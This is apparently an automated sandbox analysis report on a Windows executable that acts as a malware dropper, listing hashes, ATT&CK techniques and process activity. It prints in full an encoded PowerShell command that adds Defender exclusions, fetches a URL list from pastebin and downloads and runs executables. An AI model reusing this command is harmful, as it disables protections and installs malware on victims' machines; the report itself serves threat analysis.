90210aadcedc43e2d627f627f37da8a4e8f39761182b21cd8ca08d2ca298fa82

General

Target

Release 17.7.exe
Size

75KB
MD5

5227208358a4a2340bbd19a80f5b7f23
SHA1

148b645a30be507ffcaf072a92520abea1f06e82
SHA256

bd23f4832809874208c36aac7c9ce79203473c0bbfe14e130a54e5cf4d3dd919
SHA512

1886f8a08e11c884375e3f6d849df01ff2536f3c3b9558dbfb9a4f8ab98cec0e8f8012c1581bbb02e8bbaf01e2f0cb5010b2b2531ea3d74e5631782620ebfa9d
SSDEEP

768:JQ9JecV4dPVc7G8TjcJUsg6a//cinYskVx5/d8qZv:W9sUDQ5/dX

Score

10^/10

defense_evasion

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://pastebin.com/raw/DLjk7xXU

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
2	3920	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
1	pastebin.com
2	pastebin.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
3920	powershell.exe
3920	powershell.exe
3688	powershell.exe
3688	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	3920	powershell.exe
Token: SeDebugPrivilege	3688	powershell.exe

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 1840 wrote to memory of 3920	1840	Release 17.7.exe	82
PID 1840 wrote to memory of 3920	1840	Release 17.7.exe	82
PID 3920 wrote to memory of 3688	3920	powershell.exe	84
PID 3920 wrote to memory of 3688	3920	powershell.exe	84

C:\Users\Admin\AppData\Local\Temp\Release 17.7.exe
"C:\Users\Admin\AppData\Local\Temp\Release 17.7.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1840
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAcgBjACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGoAbgBuACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAdgBjAHIAdQBuAHQAaQBtAGUAMQA0ADQALgBkAGwAbAAgAGkAcwAgAG0AaQBzAHMAaQBuAGcAIQAnACwAJwAnACwAJwBPAEsAJwAsACcARQByAHIAbwByACcAKQA8ACMAaQBnAGgAIwA+ADsAIgA7ADwAIwB0AGkAaAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAcQBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHgAawBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAawBhACMAPgA7ACQAdwBjACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApADsAJABsAG4AawAgAD0AIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHAAYQBzAHQAZQBiAGkAbgAuAGMAbwBtAC8AcgBhAHcALwBEAEwAagBrADcAeABYAFUAJwApAC4AUwBwAGwAaQB0ACgAWwBzAHQAcgBpAG4AZwBbAF0AXQAiAGAAcgBgAG4AIgAsACAAWwBTAHQAcgBpAG4AZwBTAHAAbABpAHQATwBwAHQAaQBvAG4AcwBdADoAOgBOAG8AbgBlACkAOwAgACQAZgBuACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AFIAYQBuAGQAbwBtAEYAaQBsAGUATgBhAG0AZQAoACkAOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGwAbgBrAFsAJABpAF0ALAAgADwAIwBqAGkAbQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAG0AdgB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHkAcwBuACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACkAIAB9ADwAIwBkAHMAdgAjAD4AOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB6AGgAcAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdABoAHMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAIAB9ACAAPAAjAHEAbgBjACMAPgA="
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3920
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#jnn#>[System.Windows.Forms.MessageBox]::Show('vcruntime144.dll is missing!','','OK','Error')<#igh#>;
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3688

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Obfuscated Files or Information

1

T1027

Command Obfuscation

1

T1027.010

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
22e796539d05c5390c21787da1fb4c2b

SHA1
55320ebdedd3069b2aaf1a258462600d9ef53a58

SHA256
7c6c09f48f03421430d707d27632810414e5e2bf2eecd5eb675fecf8b45a9a92

SHA512
d9cc0cb22df56db72a71504bb3ebc36697e0a7a1d2869e0e0ab61349bda603298fe6c667737b79bf2235314fb49b883ba4c5f137d002e273e79391038ecf9c09

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
664B

MD5
2c26ccdc0ade061881225093652c7a0b

SHA1
9747d2f1b810bb48a033e27536d96458a71aa8ba

SHA256
d921090523bc51da84ddf49e45564a4a52ee2db41f299a80e72d138655ef11d3

SHA512
a6a4390634f430597005514672889277fb78fb14cf05a52e0297b2a4ff7f853f3b96a6d37b2df6f99f62ca8779b2485d64cdc9a8e37fdbd235794c043c66486d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_picaj4xq.uig.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1840-0-0x0000000000B50000-0x0000000000B68000-memory.dmp

Filesize
96KB

Download
memory/1840-1-0x00007FFF89A33000-0x00007FFF89A35000-memory.dmp

Filesize
8KB

Download
memory/3920-11-0x000001A2598E0000-0x000001A259902000-memory.dmp

Filesize
136KB

Download
memory/3920-12-0x00007FFF89A30000-0x00007FFF8A4F2000-memory.dmp

Filesize
10.8MB

Download
memory/3920-13-0x00007FFF89A30000-0x00007FFF8A4F2000-memory.dmp

Filesize
10.8MB

Download
memory/3920-14-0x00007FFF89A30000-0x00007FFF8A4F2000-memory.dmp

Filesize
10.8MB

Download
memory/3920-15-0x00007FFF89A30000-0x00007FFF8A4F2000-memory.dmp

Filesize
10.8MB

Download
memory/3920-26-0x00007FFF89A30000-0x00007FFF8A4F2000-memory.dmp

Filesize
10.8MB

Download

Resubmissions

Analysis

Sharing